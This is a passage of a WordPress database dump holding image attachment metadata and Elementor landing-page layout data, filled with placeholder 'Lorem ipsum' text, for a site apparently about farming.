";a:5:{s:4:\"file\";s:58:\"cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4534;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:58:\"cows-farming-on-green-meadow-260nw-1704884002-320x280.webp\";s:5:\"width\";i:320;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12362;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:71:\"cows-farming-on-green-meadow-260nw-1704884002-e1663753177624-50x24.webp\";s:5:\"width\";i:50;s:6:\"height\";i:24;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:322;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:72:\"cows-farming-on-green-meadow-260nw-1704884002-e1663753177624-100x59.webp\";s:5:\"width\";i:100;s:6:\"height\";i:59;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:1130;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:71:\"cows-farming-on-green-meadow-260nw-1704884002-e1663753177624-48x23.webp\";s:5:\"width\";i:48;s:6:\"height\";i:23;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:328;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:71:\"cows-farming-on-green-meadow-260nw-1704884002-e1663753177624-48x23.webp\";s:5:\"width\";i:48;s:6:\"height\";i:23;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:328;}s:24:\"elementor_custom_150x150\";a:4:{s:4:\"file\";s:75:\"elementor/thumbs/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(7416,1340,'_wp_attached_file','2022/09/banner1.jpg'),(7417,1340,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1440;s:6:\"height\";i:396;s:4:\"file\";s:19:\"2022/09/banner1.jpg\";s:8:\"filesize\";i:206549;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"banner1-300x83.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:83;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8889;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"banner1-1024x282.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:282;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65465;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"banner1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7150;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"banner1-768x211.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:211;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39787;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:19:\"banner1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22955;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:17:\"banner1-50x14.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:14;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1661;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:19:\"banner1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4334;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:17:\"banner1-48x13.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1605;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:17:\"banner1-48x13.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1605;}s:24:\"elementor_custom_600x400\";a:4:{s:4:\"file\";s:71:\"elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(7440,1342,'_elementor_edit_mode','builder'),(7441,1342,'_elementor_template_type','landing-page'),(7442,1342,'_wp_page_template','elementor_canvas'),(7443,1342,'_elementor_version','3.7.6'),(7444,1342,'_elementor_data','[{\"id\":\"0d4c6b0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e0e35cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b1b231\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"58\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ddba5ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":62.673999999999999},\"elements\":[],\"isInner\":false},{\"id\":\"f6b412a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":37.280999999999999},\"elements\":[{\"id\":\"dec077e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"title_color\":\"#051218\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a896446\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"align\":\"center\",\"text_color\":\"#070606\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":0,\"color\":\"rgba(8.457065217391303, 21.384846408317582, 29.249999999999996, 0.3)\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"813e074\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"45\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"54e7d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"a0e6cb2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f7019e\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"91\",\"right\":0,\"bottom\":\"1\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#F2FFED\"},\"elements\":[{\"id\":\"9403a68\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"border_border\":\"solid\"},\"elements\":[{\"id\":\"7208e00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"be119ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3111173\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"d2bb935\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6560df9\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fca512b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0ff468f\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false}]'),(7445,1342,'_elementor_page_assets','a:0:{}'),(7446,1343,'_elementor_edit_mode','builder'),(7447,1343,'_elementor_template_type','landing-page'),(7448,1343,'_wp_page_template','elementor_canvas'),(7449,1343,'_elementor_version','3.7.6'),(7450,1343,'_elementor_data','[{\"id\":\"0d4c6b0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e0e35cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b1b231\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"58\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ddba5ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":62.673999999999999},\"elements\":[],\"isInner\":false},{\"id\":\"f6b412a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":37.280999999999999},\"elements\":[{\"id\":\"dec077e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"title_color\":\"#051218\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a896446\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"align\":\"center\",\"text_color\":\"#070606\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":0,\"color\":\"rgba(8.457065217391303, 21.384846408317582, 29.249999999999996, 0.3)\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"813e074\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"45\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"54e7d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"a0e6cb2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f7019e\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"91\",\"right\":0,\"bottom\":\"1\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#F2FFED\"},\"elements\":[{\"id\":\"9403a68\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"border_border\":\"solid\"},\"elements\":[{\"id\":\"7208e00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"be119ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3111173\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"d2bb935\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6560df9\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fca512b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0ff468f\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false}]'),(7451,1343,'_elementor_page_assets','a:0:{}'),(7452,1344,'_elementor_edit_mode','builder'),(7453,1344,'_elementor_template_type','landing-page'),(7454,1344,'_wp_page_template','elementor_canvas'),(7455,1344,'_elementor_version','3.7.6'),(7456,1344,'_elementor_data','[{\"id\":\"0d4c6b0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e0e35cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b1b231\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"58\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ddba5ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":62.673999999999999},\"elements\":[],\"isInner\":false},{\"id\":\"f6b412a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":37.280999999999999},\"elements\":[{\"id\":\"dec077e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"title_color\":\"#051218\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a896446\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"align\":\"center\",\"text_color\":\"#070606\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":0,\"color\":\"rgba(8.457065217391303, 21.384846408317582, 29.249999999999996, 0.3)\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"813e074\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"45\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"54e7d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"a0e6cb2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f7019e\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"91\",\"right\":0,\"bottom\":\"1\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#F2FFED\"},\"elements\":[{\"id\":\"9403a68\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"border_border\":\"solid\"},\"elements\":[{\"id\":\"7208e00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"be119ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3111173\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"d2bb935\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6560df9\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fca512b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0ff468f\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false}]'),(7457,1344,'_elementor_page_assets','a:0:{}'),(7471,1350,'_elementor_edit_mode','builder'),(7472,1350,'_elementor_template_type','landing-page'),(7473,1351,'_elementor_edit_mode','builder'),(7474,1351,'_elementor_template_type','landing-page'),(7475,1352,'_elementor_edit_mode','builder'),(7476,1352,'_elementor_template_type','landing-page'),(7477,1350,'_wp_page_template','elementor_canvas'),(7478,1350,'_elementor_version','3.7.6'),(7479,1353,'_elementor_edit_mode','builder'),(7480,1353,'_elementor_template_type','landing-page'),(7481,1353,'_wp_page_template','elementor_canvas'),(7482,1353,'_elementor_version','3.7.6'),(7483,1350,'_edit_lock','1663752053:1'),(7484,1350,'_elementor_data','[{\"id\":\"cb7724c\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"13bd434\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"97e7cee\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d7d2718\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1196cc3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"66192c8\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5168614\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"4a07d27\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"327ecb6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"334a86c\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"b1f9c2b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"e5344ab\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e1c5968\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7e686a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9d60269\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":101,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5ffd233\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"e2f1149\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4ecb129\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"3e71e0f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ac03799\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aeb1a8b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ea0ea08\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"4632219\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c941f20\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"2c835db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"cfc2a03\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST 